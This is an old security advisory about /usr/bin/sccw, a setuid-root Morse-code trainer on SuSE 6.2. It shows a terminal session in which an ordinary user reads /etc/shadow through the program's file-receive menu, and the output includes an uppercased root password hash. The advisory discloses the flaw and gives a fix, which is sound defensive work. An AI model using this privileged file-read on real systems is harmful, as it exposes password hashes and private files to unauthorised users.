COMMAND

    /usr/bin/sccw

SYSTEMS AFFECTED

    SuSE 6.2

PROBLEM

    Brock  Tellier  found  following.   /usr/bin/sccw,  suid  root  by
    default on  SuSE 6.2,  allows any  user to  read any  file on  the
    system.  Sort of.   Well, it's enough to  read the text of  almost
    anything.  In capitals.  Without punctuation.  Check it out:

        xnec@susebox:/tmp > id
        uid=1001(xnec) gid=100(users) groups=100(users)
        xnec@susebox:/tmp > sccw
        ==========================================================
        Soundcard CW for Linux  v1.1  Steven J. Merrifield, VK3ESM
        ==========================================================
        1. Set the speed, currently = 10
        2. Set the frequency, currently = 700
        3. Set the volume, currently = 32
        4. Set the delay value, currently = 3
        5. Set the character set for random groups, currently = 1
        6. Set the number of groups, currently = 5
        7. Receive random character groups.
        8. Receive a file.
        9. QUIT
        ==========================================================
        Enter your choice : 8
        Enter filename : /etc/shadow
        ROOTFGPZNZWZ5GWRG10850010000
        BIN8902010000
        DAEMON8902010000
       ... etc.

    The  printing  of  these  lines  takes  a  few seconds each, so be
    patient.  While you're waiting,  remove the suid-bit.  Of  course,
    getting the /etc/shadow file in  all caps isn't instant root,  but
    it's a start for  someone out there.   Besides, he can still  read
    your mail in all caps, without punctuation.

SOLUTION

    Well, no instant root, but  at least less combinations to  try to.
    Remove suid bit.